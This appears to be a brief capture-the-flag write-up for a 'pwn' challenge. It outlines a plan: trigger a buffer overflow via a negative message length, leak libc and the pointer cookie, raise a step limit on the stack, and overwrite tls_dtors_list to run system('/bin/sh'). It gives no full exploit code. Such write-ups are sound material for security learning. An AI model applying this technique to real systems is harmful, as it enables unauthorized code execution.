Tags: pwn
Rating:
<span>using negative values in message length provide us buffer overflow. due to task approach on protecting ret addrs,
we can use
tls_dtors_list to achieve code execution and run system("/bin/sh");
cookie is our problem so we need leaking it.
leaking libc addr can be done by overwriting message function args (break *0x0804890f)
for overwriting tls_dtors i need +1 step, this can be achieved by overwriting max steps(3) on stack with (0x4)
finally we overwrite tls_dtor with address of [system_addr, bin_sh_addr] which i used tls_dtor+0x10, stack addr cannot be used to reliable exploitation
</span>
